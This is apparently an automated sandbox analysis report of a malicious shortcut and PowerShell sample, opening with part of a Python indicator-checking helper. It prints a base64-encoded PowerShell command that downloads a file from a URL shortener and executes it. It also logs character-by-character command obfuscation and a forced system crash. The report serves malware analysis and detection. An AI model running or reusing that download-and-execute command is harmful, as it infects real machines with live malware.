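     "&X-Amz-Date=20241005T125131Z&X-Amz-Expires=300&X-Amz-SignedHeaders=host"
     "&response-content-disposition=attachment%3Bfilename%3Dpowershell.zip HTTP/1.1",
     "objects.githubusercontent.com", PS_UA),
]


def request_url(request_line: str, host: str) -> str:
    """Rebuild the absolute URL from a request line and its Host header.

    All three connections in the report were TLS 1.2 on port 443, so https is assumed.
    """
    method, target, _version = request_line.split(" ", 2)
    if method != "GET":
        raise ValueError("only GET requests appear in this report")
    return "https://" + host + target


def is_powershell_client(user_agent: str) -> bool:
    """Invoke-WebRequest on Windows PowerShell 5.1 sends a Mozilla/5.0 prefix
    followed by a WindowsPowerShell/<version> token.

    The browser-looking prefix is what the report's 'known web browser user
    agent' signature refers to; the PowerShell token is the part to search
    proxy logs for, since browsers never send it.
    """
    return "WindowsPowerShell/" in user_agent or " PowerShell/" in user_agent


def presigned_window(url: str):
    """Return (signed_at, expires_at) in UTC for an AWS SigV4 presigned URL, else None.

    The object URL above carries X-Amz-Expires=300: it stops working five
    minutes after X-Amz-Date. To re-acquire the payload one has to start from
    the shortener again, and a shortener target can be repointed by the
    operator at any time, so the hash of what was downloaded at analysis time
    is the durable indicator, not this URL.
    """
    query = parse_qs(urlsplit(url).query)
    if "X-Amz-Date" not in query or "X-Amz-Expires" not in query:
        return None
    signed_at = datetime.strptime(query["X-Amz-Date"][0], "%Y%m%dT%H%M%SZ")
    signed_at = signed_at.replace(tzinfo=timezone.utc)
    return signed_at, signed_at + timedelta(seconds=int(query["X-Amz-Expires"][0]))


def delivery_chain(requests) -> list:
    """Hostnames in the order the sample contacted them."""
    return [host for _line, host, _ua in requests]


if __name__ == "__main__":
    for line, host, ua in REQUESTS:
        url = request_url(line, host)
        print(url, "powershell-client" if is_powershell_client(ua) else "other-client")
        window = presigned_window(url)
        if window:
            print("  valid from", window[0].isoformat(), "until", window[1].isoformat())
    print(" -> ".join(delivery_chain(REQUESTS)))
```

For this sample the window is 2024-10-05T12:51:31Z to 12:56:31Z, the analysis time itself; anyone re-checking the chain afterwards must resolve is.gd/jwr7JD afresh rather than reuse the object URL.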
Source: powershell.exe, 0000004B.00000002.2267603715.000002146D8BE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000004B.00000002.2267603715.000002146D9F5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000004B.00000002.2248209888.000002145F17E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000004B.00000002.2248209888.000002145DA74000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000004B.00000002.2248209888.000002145EEEC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 0000004B.00000002.2248209888.000002145D841000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000004B.00000002.2248209888.000002145EEEC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 0000004B.00000002.2248209888.000002145DA74000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000004B.00000002.2248209888.000002145EEEC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 0000004B.00000002.2248209888.000002145D841000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 0000004B.00000002.2248209888.000002145F17E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000004B.00000002.2248209888.000002145F17E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000004B.00000002.2248209888.000002145F17E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000004B.00000002.2248209888.000002145DA74000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000004B.00000002.2248209888.000002145EEEC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 0000004B.00000002.2248209888.000002145E474000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://go.micro
Source: powershell.exe, 0000004B.00000002.2267603715.000002146D8BE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000004B.00000002.2267603715.000002146D9F5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000004B.00000002.2248209888.000002145F17E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 0000004B.00000002.2248209888.000002145EEEC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://oneget.org
Source: powershell.exe, 0000004B.00000002.2248209888.000002145EEEC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://oneget.orgX
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown | Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49712

E-Banking Fraud

Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -e 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

System Summary

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Hard error raised: shutdown
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 75_2_00007FFD34575B94 NtRaiseHardError
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 75_2_00007FFD345716C9
Source: C:\Windows\System32\cmd.exe | Process created: Commandline size = 3279
Source: pbkjdvqy.dll.76.dr, X.cs | Base64 encoded string: 'RNo8TZ56Rv+EyZW73NocFOIiNFfL45tXw24UogGdHkswea/WhnNhCNwjQn1aWjfw'
Source: classification engine | Classification label: mal100.rans.bank.expl.evad.winLNK@131/13@3/3
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3pmmnvk1.1fc.ps1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File read: C:\Users\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e aQB3AHIAIABpAHMALgBnAGQALwBqAHcAcgA3AEoARAAgAC0AbwAgACQAZQBuAHYAOgBUAE0AUAAvAC4AYwBtAGQAOwAmACAAJABlAG4AdgA6AFQATQBQAC8ALgBjAG0AZAA=
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\.cmd""
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe cmd /c exit 97
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe cmd /c exit 98
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe cmd /c exit 99
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe cmd /c exit 100
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe cmd /c exit 101
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe cmd /c exit 102
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe cmd /c exit 103
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe cmd /c exit 104
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe cmd /c exit 105
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe cmd /c exit 106
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe cmd /c exit 107
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe cmd /c exit 108
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe cmd /c exit 109
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe cmd /c exit 110
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe cmd /c exit 111
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe cmd /c exit 112
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe cmd /c exit 113
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe cmd /c exit 114
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe cmd /c exit 115
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe cmd /c exit 116
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe cmd /c exit 117
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe cmd /c exit 118
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe cmd /c exit 119
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe cmd /c exit 120
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe cmd /c exit 121
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe cmd /c exit 122
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe cmd /c exit 65
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe cmd /c exit 66
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe cmd /c exit 67
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe cmd /c exit 68
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe cmd /c exit 69
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe cmd /c exit 70
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe cmd /c exit 71
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe cmd /c exit 72
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe cmd /c exit 79
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe cmd /c exit 80
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe cmd /c exit 81
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe cmd /c exit 82
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe cmd /c exit 86
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe cmd /c exit 88
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe cmd /c exit 50
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe cmd /c exit 51
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe cmd /c exit 52
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe cmd /c exit 53
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe cmd /c exit 57
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe cmd /c exit 123
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe cmd /c exit 63
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe cmd /c exit 58
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe cmd /c exit 46
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -e 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
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pbkjdvqy\pbkjdvqy.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES7AF.tmp" "c:\Users\user\AppData\Local\Temp\pbkjdvqy\CSC3B4ECC64669B4C7AA39D189AE322B4F.TMP"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\.cmd""
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 97
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 98
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 99
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 100
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 101
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 102
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 103
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 104
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 105
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 106
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 107
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 108
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 109
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 110
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 111
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 112
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 113
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 114
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 115
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 116
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 117
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 118
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 119
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 120
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 121
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 122
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 65
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 66
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 67
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 68
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 69
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 70
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 71
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 72
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 109
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 110
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 111
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 112
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 113
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 114
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 79
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 80
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 81
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 82
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 119
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 100
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 101
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 86
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 104
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 88
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 68
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 69
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 70
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 71
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 50
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 51
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 52
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 53
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 113
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 116
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 117
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 57
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 123
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 98
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 63
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 58
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 46
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 104
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 88
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 68
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 69
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdatauser.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dll
